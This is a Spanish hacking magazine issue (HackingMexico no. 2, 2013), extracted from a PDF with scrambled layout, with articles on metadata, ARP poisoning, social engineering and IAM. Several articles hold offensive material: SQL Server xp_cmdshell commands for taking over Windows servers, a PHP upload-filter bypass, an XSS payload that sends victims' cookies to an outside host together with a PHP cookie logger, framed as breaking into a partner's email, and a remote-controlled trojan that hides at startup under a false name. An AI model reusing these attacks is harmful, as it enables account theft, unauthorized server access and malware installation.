Académique Documents
Professionnel Documents
Culture Documents
ISSUE# 02
Editorial
Una vez mas estamos de
vuelta con el segundo
numero de la revista,
la respuesta por parte
de ustedes los lectores
fue increble, el primer
tiraje se termino en
su totalidad, hemos
estado visitando una gran cantidad
de Universidades en la republica
Mexicana para promocionar la revista,
llevndoles charlas gratuitas con el
staff de HackingMexico, y tambin
organizando congresos y talleres de
aprendizaje extremos, ya contamos con
un staff mas amplio de conferencistas
reconocidos a nivel nacional e
internacional con los cuales estaremos
llevando los congresos a muchas
Universidades del pas.
Una acalaracion que me gustara hacer,
recibimos algunos comentarios en la
edicin anterior sobre las faltas de
ortografa que hay en la revista, esto
se debe a que se decidio conservar la
originalidad y escencia de cada autor,
nosotros no editamos ni censuramos
ningn contenido, tal y como nos envan
Xianur0
Molder Sombrero De Paja
Axxus
Mini Helios
Innovattia
Universidad Francisco I
Madero
Instituto Tecnologico De
Tehuacan
Casa Vecina
Reunion Ubuntista
Instituto De Estudios
Superiores De Oaxaca
Telmehub
Universidad Tecnologica
De San Juan Del Rio
Universidad Tecnologica
De Tecamachalco
Defcon Tijuana
Escuela Superior De
Computo
Universidad Anahuac
Instituto Tecnologico De
Tuxtepec
Campus Party
HackingMexico, Ao 1, No. 2, enero marzo 2013, es una publicacin bimestral editada por Editorial Althair, www.indautor.sep.gob.mx, infoinda@sep.gob.mx. Editor responsable: Raul
Robles Aviles. ISSN: en tramite, otorgado por el Instituto Nacional del Derecho de Autor, Licitud de Ttulo y contenido pendiente otorgado por la Comisin Calificadora de Publicaciones
y Revistas Ilustradas de la Secretara de Gobernacin. Permiso SEPOMEX No. 010203. Impresa por Alex Impresiones S. A. de C. V. Jose Revueltas 209 Del Benito Juarez, CP 03520 este
nmero se termin de imprimir el 30 de Enero de 2013 con un tiraje de 7,000 ejemplares. Las opiniones expresadas por los autores no necesariamente reflejan la postura del editor de la
publicacin. Queda estrictamente prohibida la reproduccin total o parcial de los contenidos e imgenes de la publicacin sin previa autorizacin del Instituto Nacional del Derecho de Autor.
No nos hacemos responsables por el mal uso de la informacion aqui expuesta, todo el material es con fines educativos y de investigacion, hackingmexico no incita a ningun tipo de vandalismo
virtual, cyberbullying, ni cyberamenzas. La informacion es para conocimiento de todos, para poder aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y activismo como Anonymous, nosotros somos un grupo de profesionales expertos en seguridad informatica que no apoyan este tipo
de actividades delictivas.
hax0rpedia
Hax0rpedia
Hambreado
Pwner
N00b
Hash
Profesor x
Novato
Lam0
Lammer
Variacion de lam0
Md5
Bitcoins
Wargame
Pwn
Deepweb
Tor
Red de anonimato
www.hackingmexico.mx
contenido
CONTENTS PAGE
Algo ms all
de lo visible 06
[Deteccin /proteccin] [de/
contra] ataques ARP-Poisoning
(ARP-Spoofing) 08
Ingeniera social /
la mayor parte 12
Penetracin de
servidores windows 16
Hackeando
Correos
mito o
realidad 34
Identity
and Access
Management
Ayudando a la
organizacin
Bypassing
de Uploaders 20
WarDriving 24
CRACKEANDO
ACUNETIX
V82012 28
www.hackingmexico.mx
36
CISCO/
JUNIPER 38
Nxt Controler
Un troyano
Para divertirse 42
P U B L C A T E
C O N
informes
55
N O S O T R O S
10
68
88
09
i n f o @ h a c k i n g m e x i c o . m x
Algo m s
de lo all
visible
QUE SON LOS
METADATOS?
www.hackingmexico.mx
Figura 1
POr
Froylan Sedeo
@zolidk
con un iPhone en la cual se puede ver la posicin GPS mediante los metadatos EXIF. Existen varios casos curiosos en
la red de varias personas que se ha visto expuesta su privacidad por los metadatos. (Figura 1)
Algunos programas para analizarlos metadatos son
FOCA, EXIF, IPTC, XMP y muchos ms. As como creepy
que nos permite localizar imgenes de usuarios de twitter
para examinar los metadatos y obtener la localizacin donde
fue tomada dicha imagen. (Figura 2,3,4)
Figura 2
Figura 4
Figura 3
Existe una pgina en la red que ofrece un servicio que permite localizar tu cmara o por lo menos tratar, esto lo hace analizando los
metadatos de las fotogrficas se sube una imagen que haya sido
tomada por tu cmara sin modificar y se analiza el archivo EXIF
el cual contiene el nmero de serie y otros datos nicos de la cmara, busca en su base de datos y tratara de encontrar si existe alguna
otra imagen en la red con los mismos datos si tu cmara fue robada
fue usada y subieron imgenes a la red seguramente aparecer en
la plataforma aqu el link de la pgina por si quieres probar http://
www.stolencamerafinder.com/
www.hackingmexico.mx
deteccin / proteccin
[Deteccin/p
POr
Jess Gmez (ZoSemU?)
zosemu@gmail.com
En este articulo me
permitir explayarme con la
teora porque creo que es
necesaria para comprender
a fondo que es lo que pasa
en este tipo de ataques, la
principal razn de hacerlo
as y no de otra manera es
que he visto que muchos que
dicen ser huaxors lite,
no tienen idea de cmo
funciona realmente esto y
luego dicen cosas que no
son ciertas.
Figura 1
www.hackingmexico.mx
[de/co
ataq
ARP-Poi
(
A R P -
S p
deteccin / proteccin
proteccin]
ontra]
ques
isoning
o o f i n g )
contrario correramos el riesgo de que nuestra informacin terminar en casa del vecino XD!!!-- en caso de no
encontrar dicha MAC en nuestra preciosa tabla se deber
realizar una consulta para averiguar cual es la direccin
MAC correspondiente a dicha IP, esto se conoce como
ARP REQUEST, debido a la limitante de la capa en la
que opera, este tipo de consultas en realidad se realizan
a la direccin del Broadcast (FF:FF:FF:FF:FF:FF) para
cada IP a consultar, pero normalmente comienzan con la
IP de la que se desea averiguar la MAC, esto con el fin de
reducir la saturacin de trafico; por otra parte el equipo al
que le estamos enviando el REQUEST recibe el paquete
y debe actuar en consecuencia, lo que hace envindonos
un paquete del tipo ARP REPLY. Para que ilustrar lo anterior, voy a mostrar a detalle con una captura de Wireshark. (Figura 1)
Es importante que podamos interpretar lo que significa
la informacin que tenemos para poder encontrar una forma
de hacer que se comporte de otro modo, viendo al desnudo
nuestro ARP REQUEST podemos darnos una idea de como
funciona entonces el ARP Poisoning.
En la estructura observamos que el paquete observamos
que esta compuesto por:
1. Capa de transmisin Ethernet
La direccin fsica de destino en este caso el broadcast --6
bytes(ff ff ff ff ff ff)
La direccin fsica de origen --6 bytes (xx xx xx 71 cc e1)
El tipo de protocolo --2 bytes (08 06)
Figura 2
deteccin / proteccin
10
www.hackingmexico.mx
deteccin / proteccin
Figura 3
Figura 4
www.hackingmexico.mx
11
ingeniera social
una vulnerabilidad del sistema para hackear el servicio y obtener la clave (por ejemplo, la famosa creencia de hackear
Hotmail). Para empezar, las claves van encriptadas en los
principales servicios y slo pueden cambiarse, no pueden
verse o saberse partiendo del hash.
En Hotmail, nos encontrbamos con la famosa pregunta secreta, posteriormente agregaron preguntas ms extra-
Ing
soc
as, como el cdigo postal donde vives (a veces ni nosotros
lo sabemos), por lo que no poda ignorarse que la cuenta
pertenece a una persona de quien debe tenerse informacin.
Actualmente, la mayora de las empresas, sin importar su tamao, an no se toman muy en serio el asunto de
que la seguridad informtica es tambin responsabilidad
12
www.hackingmexico.mx
ingeniera social
cin, es posible que quieran sacar provecho del conocimiento que poseen.
Es aqu donde hay alguien que sabe algo que nosotros quiz
no, y es posible que nos interese saberlo. Se imaginan conocer
por adelantado un gran hallazgo en una compaa, lo suficientemente importante como para saber que sus acciones subirn
y que si compras ahora ganaras mucho dinero? Sin duda es
geniera
la mayor
cial parte
de las preguntas y pedir a alguien que las responda, muy probablemente no lo haga y se d cuenta del truco.
Pongamos un ejemplo de ingeniera social: pasas un
chismgrafo (es una lista de preguntas que suele jugarse
contestando, para distraerse o despejarse, o simplemente
divertirte leyendo las respuestas de otros) con esas pre-
www.hackingmexico.mx
13
ingeniera social
14
ofrecerle a alguien guardar una copia extra de la contrasea, por seguridad y garantizar que est en buenas
manos Listo.
Para conocer personas tambin funciona. Las chicas estn ms familiarizadas que los chicos con la ingeniera social; por ejemplo, si ests hablando con una chica, ella podr
leer tu lenguaje corporal fcilmente. Las palabras podran
www.hackingmexico.mx
ingeniera social
www.hackingmexico.mx
15
Penetracin
de
16
servidores
windows
www.hackingmexico.mx
ola soy Omar Ibaez (CorruptedByte), en esta ocacion mostrare una manera de penetrar servidores windows o mas bien como escalar privilegios
mediante SQL Server 2008. Muchas veces nos topamos con vulnerabilidades como arbitrary file download, transversal directory, local file
inclusion, oracle padding attack u otras y esto solo nos da acceso a codigo fuente o
archivos de configuracin donde podemos encontrar el usuario y contrasea de SQL
Server (web.config) pero con esto muchas veces solo tenemos acceso a la base de datos
donde encontramos usuarios, contraseas o muchas veces solo informacion inutil, pero
que tal si pudieramos tomar contro total del servidor con tan solo las credenciales de
SQL Server, esto es lo que mostrare en el transcurso de este articulo.
XP_CMDSHELL
Uno de los stored procedures que tiene SQL Server es xp_
cmdshell, xp_cmdshell nos proporciona una shell de comandos directamente en el sistema con privilegios normalmente
administrativos asi que ya se podran imaginar que tanto podemos hacer con este stored procedure.
17
HABILITANDO XP_
CMDSHELL
Regresando al tema del xp_cmdshell,
como les comente desde SQL Server
2005 biene desactivado, pero se activa ejecutando las siguientes lineas en
un query normal en cualquier base de
datos del sistema:
Linea para habilitar las opciones
avanzadas
EXEC sp_configure show advanced options, 1
GO
Linea para actualizar la configuracion
RECONFIGURE
GO
Linea para habilitar el stored procedure xp_cmdshell
EXEC sp_configure xp_cmdshell, 1
GO
Linea para actualizar la configuracion
RECONFIGURE GO
Con las anteriores lineas abremos activado el stored procedure de manera
completa, obviamente para esto se tiene
que acceder a ala base de datos con el
usuario sa (usuario default adminsitrativo de SQL Server) o algun otro
usuario adminsitrativo de SQL.
TOMANDO EL CONTROL
TOTAL DEL SERVIDOR CON
XP_CMDSHELL
Una vez que tenemos activado el stored procedure tenemos el control total
del servidor ya que podemos ejecutar
cualquier comando y se hace de la siguiente manera:
EXEC master.dbo.xp_cmdshell
comando a ejecutat
Ejemplo:
EXEC master.dbo.xp_cmdshell
DIR C:\ (Figura 1)
18
www.hackingmexico.mx
Ahora podremos acceder a las opciones de MSS Exploiter como se muestra a continuacion:
www.hackingmexico.mx
19
bypassing de uploaders
Bypassing de Uploaders
20
www.hackingmexico.mx
por
Braulio Miguel Suarez Urquijo
(Red-Point)
r3d-p0int@hotmail.com
}
}
?>
Cdigo:
<?php
$archivo =
$HTTP_POST_
FILES[archivo];
$nombre =
$archivo[name];
$exten =
strrchr($nombre,
.);
if ($ext ==
php or $ext ==
php5) {
echoNo
aceptamos ese tipo de
archivos;
}else{
if
(move_uploaded_
file($archivo[tmp_name],
$archivo[name])){
echo Archivo subido
correctamente a <a href=.$archivo
[name].>Archivo</a>;
}else{
echo Imposible subir archivo;
bypassing de uploaders
if (!($ext != jpg)) {
echoNo aceptamos esa extension;
}else{
if (move_uploaded_file($archivo[tmp_name],
$archivo[name])){
echo Archivo subido correctamente <a href=.$arc
hivo[name].>Archivo</a>;
}else{
echo Imposible subir archivo;
}
}
?>
Ese es un ejemplo muy simple, ahi
bastara con subir un archivo con
nombre h4x0r1337.jpeg.php para
bypassear. Aqu pongo otro un
poco ms complicado:
As
lo
gra
ria
mos
bypassear
el
uploader
Ojala sea de utilidad este pequeo tuto de como
Bypassear uploaders, Por motivos de trabajo me es
muy dificil encontrar tiempo libre para colaborar, pero
cuando me encuentro un espacio lo hago con mucho
gusto, saludos.
www.hackingmexico.mx
21
HackShop
Cursos Online
Diplomados
DVDs
Revistas
Hacking
Gadgets
Este router crackea las redes WEP y WPA automaticamente, no requiere de software extra, ni de una
computadora, solo conectalo y listo.
HACKINGMEXICO DVD 1
Ya puedes adquerir el primer DVD de HackingMexico que viene a tope con video tutoriales
paso a paso, mas de 50 herramientas de Hacking
compiladas en una interfaz grafica y la revista
en formato digital.
Contiene algunas herramientas desarrolladas por el staff de HackingMexico, otras son
Open Source
makuantosh
Haciendo
WarDriving
Con IPhone,
M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net
24
www.hackingmexico.mx
Obteniendo
Claves WEP
mas rpido ke con
Provedoor de Servicio
Fabricante y marca del modem
Direccion MAC
Tipo de Seguridad
Implementada (WEP,
WPA,WPSK) etc.
Canales de Acceso
No falta el pendejo ke diga no mames
, yo pa ke kiero saber eso ke pongan
como hacerlo , y siempre he dicho
algo si vas a hacer algo hazlo bien , no
nadamas es hackear algo por hacerlo
, hay ke saber hacer bien las cosas .
*Las Aplicaciones estar disponibles
en la Repo de m4ku4z.net .
*Antes que nada Debes Hacer hecho
el jailbreak en tu idevice. (si la banda pide un tuto para hacer el jailbreak
lo hare , a estas alturas debo asumir
que cualkiera de ustedes sabe hacer jailbreak , ya que considero que
hay demasiados tutos en google ,
pero si la banda lo rekiere pdanlo.
*Este Procedimiento lo he hecho en
Mexico y funciona , no he probado en
otros pases.
ma atakeremos:
makuantosh
www.hackingmexico.mx
25
makuantosh
5. Obteniendo la Clave
6. Conectandonos al Modem
26
www.hackingmexico.mx
SPEEDSSID
makuantosh
http://repo.m4ku4z.net/cydia
YO
SOY
M4KU4Z
EL
Y USTEDES
NO
www.hackingmexico.mx
27
crackeando acunetix
CRACKEANDO
ACUNET
Parte 1 de 3 / REVERSING / NIVEL: MEDIO-AVANZADO
28
www.hackingmexico.mx
crackeando acunetix
TIX
V82012
EXPLORANDO AL ENEMIGO
Primero Instalamos y se me ocurri correr el software para
ver que tipo de proteccin o limitacin utilizaba , veamos.
www.hackingmexico.mx
29
crackeando acunetix
30
www.hackingmexico.mx
Como les decia mis sospechas eran ciertas pues el software utiliza esa direccion
de memoria en muchisimos otros lugares, posiblemente para hacer chequeos
crackeando acunetix
www.hackingmexico.mx
31
crackeando acunetix
32
www.hackingmexico.mx
hackeando correos
al vez la primera inquietud de muchos al iniciarse en el mundo del hacking, es Puedo hackear el
email de mi novia? La respuesta simple es SI,
pero sigue leyendo, no te emociones tanto.
Hac
C
Por M.C Raul
Robles Aviles
Megabyte
Site Scripting), pero este tipo de bugs aparecen una vez cada
ao bisiesto, y duran muy pocas horas activos.
La forma de explotarlo seria encontrar donde se pueda inyectar codigo en la pagina del correo, por ejemplo
http://facebook.com/app.php?><script language=
JavaScript>document.location=http://tupagina.com/
cookie.php?cookie= + document.cookie;document.
location=http://tupagina.com</script>
CODIGO DE COOKIE.PHP:
<?php
function GetIP()
{
if (getenv(HTTP_CLIENT_IP) && strcasecmp(getenv(HTTP_CLIENT_IP), unknown))
$ip = getenv(HTTP_CLIENT_IP);
else if (getenv(HTTP_X_FORWARDED_FOR) && strcasecmp(getenv(HTTP_X_FORWARDED_FOR), unknown))
$ip = getenv(HTTP_X_FORWARDED_FOR);
else if (getenv(REMOTE_ADDR) && strcasecmp(getenv(REMOTE_ADDR), unknown))
$ip = getenv(REMOTE_ADDR);
else if (isset($_SERVER[REMOTE_ADDR]) && $_SERVER[REMOTE_ADDR] && strcasecmp($_SERVER[REMOTE_ADDR],
unknown))
$ip = $_SERVER[REMOTE_ADDR];
else
$ip = unknown;
return($ip);
}
function logData()
{
$ipLog=log.txt;
$cookie = $_SERVER[QUERY_STRING];
$register_globals = (bool) ini_get(register_gobals);
if ($register_globals) $ip = getenv(REMOTE_ADDR);
else $ip = GetIP();
$rem_port = $_SERVER[REMOTE_PORT];
$user_agent = $_SERVER[HTTP_USER_AGENT];
$rqst_method = $_SERVER[METHOD];
$rem_host = $_SERVER[REMOTE_HOST];
$referer = $_SERVER[HTTP_REFERER];
$date=date (l dS of F Y h:i:s A);
$log=fopen($ipLog, a+);
if (preg_match(/\bhtm\b/i, $ipLog) || preg_match(/\bhtml\b/i, $ipLog))
fputs($log, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF:
$referer | DATE{ : } $date | COOKIE: $cookie <br>);
else
fputs($log, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF:
$referer | DATE: $date | COOKIE: $cookie \n\n);
fclose($log);
}
logData();
?>
34
www.hackingmexico.mx
hackeando correos
keando
orreos
mito
realidad
Una vez armado esto, hace que la victima abra tu pagina
donde este un iframe con el codigo que roba la cookie, una
vez teniendo la cookie, puedes utilizar plugins de Firefox
para editar la cookie y loguearte a la cuenta de la victima.
INGENIERIA SOCIAL
Este es el metodo mas comun y sencillo, consiste en enviarle
a la victima una pagina falsa que le pida su contrasea, por
ejemplo una postal de un admirador secreto, que al hacer
click pida usuario y contrasea para poder verla. La efectividad depende de que tanta experiencia tenga la victima con
este tipo de ataques.
FUERZA BRUTA
Hoy en dia es casi imposible realizar estos ataques debido a que
el sistema te banea despus de ciertos intentos, pero consiste
en utilizar un diccionario de palabras o de passwords comunes
para intentar entrar a la cuenta. Es un metodo lento, y tedioso,
puedes llevarte semanas y jamas dar con el password.
KEYLOGGERS
Esto requiere que le instales un software de keylogger a la victima, necesitarias enviarle un archivo y que ellos lo ejecuten,
tambien existen keyloggers de hardware donde se conecta el
teclado a este dispositivo que guarda todas las teclas, pero para
esto necesitas acceso fisico a la computadora de la victima
0DAYS
Estos son mas raros de encontrar, como en Gmail que permitia
resetear el password de cualquier usuario mediante la inyeccion
de un carcter de salto de linea, salvo que tu descubras un bug
de estos, o estes en el momento justo, y en el lugar indicado, es
posible que jamas veas activo un error de esta magnitud. Estos
son los mas efectivos ya que si permiten un hackeo casi instantaneo, pero son difciles de conseguir.
De ah en fuera cualquier otro metodo que veas en la red, es
seguramente un scam, no existe mayor ciencia, ni programas
magicos que hackean cuentas, por lo regular son troyanos y
malware. Antes de ir por tanto lio, preguntante si realmente
vale la pena pasar por todo eso, si tienes dudas de tu novia,
mejor cortala y ya. Recuerda que el busca encuentra.
www.hackingmexico.mx
35
Identity
andAccess
Management
SIMPLIFICA Y ASEGURA
Identity and Access Management
(IAM) certifica que las personas dentro de una organizacin tengan los
permisos y servicios que deban de
tener, no ms y no menos, para ejercer su labor, los cuales, la mayora de
las veces, se encuentran distribuidos
y hasta cierto punto duplicados entre
las aplicaciones de una organizacin
utiliza. Imaginen cuntas brechas de
seguridad se pueden encontrar en un
modelo de este estilo.
La solucin es utilizar esa misma informacin sobre los usuarios en todas
las aplicaciones. IAM unifica estas
identidades para manejarse de manera centralizada y as poder aplicar las
polticas y procedimientos desde un
punto. Esto simplifica la construccin
de solamente un punto de referencia
que funcione para todas las aplicaciones y asegura las identidades de los
usuarios consolidando la infraestructura de muchos a uno y reduciendo
las brechas de seguridad de un estado
abrumador a manejable.
CONSTRUYENDO UN IAM
El primer paso para construir un IAM
es identificar el flujo de datos en una organizacin sobre los usuarios y decidir
qu datos son relevantes de las entidades fuente (Recursos Humanos, Control
Escolar, etc.), consolidar y actualizar la
informacin de todas las identidades en
una sola identidad para todos los usuarios de una organizacin.
36
www.hackingmexico.mx
ADMINISTRACIN
DE ACCESOS
En un IAM el acceso a las aplicaciones puede estar definido por polticas
de negocio, polticas de seguridad y
requerimientos del usuario.
Debemos crear un mapeo en el cual
asociemos grupos de usuarios con controles de acceso, esto lo podemos lograr
construyendo roles y flujos de procesos
que se adecuen a las necesidades del
grupo de usuario que estamos clasificando. Posteriormente se mapean los
privilegios a los roles, se asignan roles
a los flujos y se asignan identidades a
los roles. Esta parte es la ms talachuda,
pero una vez que tengamos esto todo lo
dems ser pan comido.
ADMINISTRACIN
DE IDENTIDADES
Se requiere un mapeo de roles y reglas
a usuarios especficos que permitan el
acceso apropiado a los servicios. A su
vez, se requiere crear un proceso que
administre y lleve registro de accesos
a sistemas y datos, este proceso se
debe encargar del aprovisionamiento
de servicios a los usuarios definidos
por el rol que les corresponda; tambin se debe de establecer un flujo de
trabajo el cual define cmo se har
este aprovisionamiento y por ltimo
debe de considerarse que estos procesos puedan ser auditables.
Por
Annika Pringles
@annikapringles
FUNCIONAMIENTO
DE UN IAM
Para el funcionamiento de un IAM
utilizar un ejemplo para mostrar
las partes que no pueden faltar en su
construccin:
1. El usuario se conecta a un servidor Web.
2. El servidor Web tiene un conector o agente que es prcticamente una interfaz hacia el
administrador de accesos, este
puede utilizar un plug-in o APIs
para su conexin.
3. El administrador de accesos es
un Punto de Aplicacin de Poltica por lo cual se debe contemplar que sea un sistema de alto
volumen y alta disponibilidad
ya que estar tomando decisiones para las solicitudes de acceso del servidor Web.
4. El administrador de identidades
es un Punto de Administracin
de Poltica que administra centralizadamente toda la informacin de las identidades desde
varias fuentes y es capaz de definir procesos y flujos que mantengan, administren y auditen
el acceso a los recursos.
Ayudando a la organizacin
RBAC
Una vez que llegamos a este punto podemos empezar a utilizar un modelo
que se llama RBAC (Role Based Access Control), el cual nos permite generar cubos de informacin sobre los
roles que estarn haciendo utilizados
para los accesos en las aplicaciones.
Utilizar RBAC soluciona el problema
de administracin de privilegios mejor
que DAC o MAC, pero el desarrollo de
herencia de roles es realizada manualmente y hay pocas herramientas que
nos pueden ayudar a realizarlo.
www.hackingmexico.mx
37
cisco/juniper
l sistema operativo de
Microsoft (Windows)
por ser el mas usado
es objeto de constantes
ataques, al igual los sistemas
operativos de equipos de
Redes mas usados como son
CISCO y JUNIPER, tambin
estn siendo objeto de testeo
para su vulneracin. Y como
tal estos tambin cuentan con
sus actualizaciones y/o parches
para corregir sus problemas de
seguridad.
Algunos ejemplos de seguridad
en equipos y/o software que
ofrecen las empresas CISCO y
JUNIPER son:
Equipos JUNIPER:
CISC
JUNI
Como observamos en la tabla de arriba, los dos ofrecen muchas posibilidades de seguridad informtica, no
podemos abarcar todos en este artculo as que nos enfocaremos en uno de
ellos. Hablaremos un poco de los IDP
(Intrusion Detection Prevention) y los
IPS (Intrusion Prevention System).
Equipos CISCO:
38
www.hackingmexico.mx
IPER
mente, he aqu el problema, se dejan
comnmente abiertos los puertos 80,
443 y 22 que son respectivamente
http, https y SSH.
Pero si ya es un poco arriesgado
dejar puertos abiertos, imagnense
que para el colmo como me ha tocado
ver y administrar varios equipos de
cisco/juniper
CO/
Por
Ing. Manuel Dublan aka.
t3zc4
www.hackingmexico.mx
39
cisco/juniper
A Continuacin se mostrara
en un ejemplo de ataque de
diccionario para tener acceso
al equipo, ocuparemos BT 5
con sus tools xhydra (ataque de
diccionario o tambin conocido
como Brute force) y zenmap
(Escaneo de puertos), teniendo en
cuenta algunos aspectos descritos
anteriormente.
Lo primero es conocer la IP de
nuestra victima en este caso del
equipo y realizar un escaneo de
puertos, este se puede realizar con
nmap o zenmap.
Bru
for
2
Obtenidos que puertos se encuentran
abiertos creamos dos archivos de
texto sobre el escritorio de BT. Un
archivo es para el user y el otro para
los passwords.
40
www.hackingmexico.mx
cisco/juniper
ute
rce
www.hackingmexico.mx
41
nxt controler
NxtControler
troyano
Un
Paradivertirse
xt Controler es un virus de
tipo Troyano que recibe
comandos de un emisor remoto va Ftp, los cuales al
recibirse ejecutan una accin predeterminada, La lista de comandos consta de
comandos bsicos y divertidos, Cada
comando esta en corchetes, hasta ahora
la lista es algo corta pero seguiremos actualizando, ahora mismo trabajamos en
la manipulacin de archivos.
[END]-Termina la aplicacin
Remota
[SHUTDOWN]-Apaga el
computador
[RESTART]-Reinicia el
computador
[LOG-OFF]-Cierra sesin
[PSY]-Abre el video en youtube
de Oppa Gangnam style
[CD-OPEN]-Abre la bandeja de
CDs
[CD-CLSE]-Cierra La bandeja
de CDs
[CLEAR]-Limpia la ventana de
comandos
[MNTOR-OFF]-Apaga el
monitor
[HD-TSKBR]-Esconde la barra
de tareas
[SW-TSKBR]-Muestra la barra
de tareas
[BGRND-1]- Cambia el Fondo
por latin lover
[BGRND-2]-Cambia el fondo
Por una chica sexy
[Kill[Proceso]-Termina el
proceso escrito
[MSG[Mensaje]-Manda un
Messagebox con el mensaje
escrito
[UNINSTALL]-Elimina todo
rastro de el virus
http://nxthacks.webs.com/nxtcontrol
http://www.hackingmexico.mx/
nxthacks
http://neqprojects.webs.com/
nxtcontrol.htm
Esta es una aplicacin portable, y es
fcil de usar: (Figura 1)
Para crear nuestro NXT-Controler necesitamos un servidor FTP dedicado, yo
recomiendo usar la compaa 000webhost.com porque es gratis y fcil, debemos ingresar la informacin de nues-
(Figura 1)
42
www.hackingmexico.mx
Por
Fernando I. Nequis
tro servidor Ftp Y darle clic en Try, en
la barra inferior de status nos aparecer
Try Succesful si es que esta correcto,
si no aparece esto debemos checar que
todo est bien escrito, despus pasamos
a la parte derecha donde se encuentra un
cuadro de texto, en este cuadro de texto
debemos poner donde queremos que se
creen los archivos, en la parte inferior
esta una lista de los archivos que queremos crear, en la cual se encuentran:
Command List: Crea un archivo
de texto con la lista de todos los
comandos y sus usos.
Portable Exe: Es el virus Receptor Portable.
Instaler Exe: Es el virus Receptor instalable, solo lo debes ejecutar y automticamente se copia
en inicio para que inicie cada que
se prende el ordenador, se copia
con el nombre de Conexiones de
Red por seguridad.
Remote Controler: Es el programa emisor de Comandos.
Test Exe: Es el virus receptor,
pero este no se esconde y es portable lo cual te permite ver su correcto funcionamiento.
.TXT
EMISOR
RECEPTOR
(Figura 2)
nxt controler
.TXT
www.hackingmexico.mx
43
#02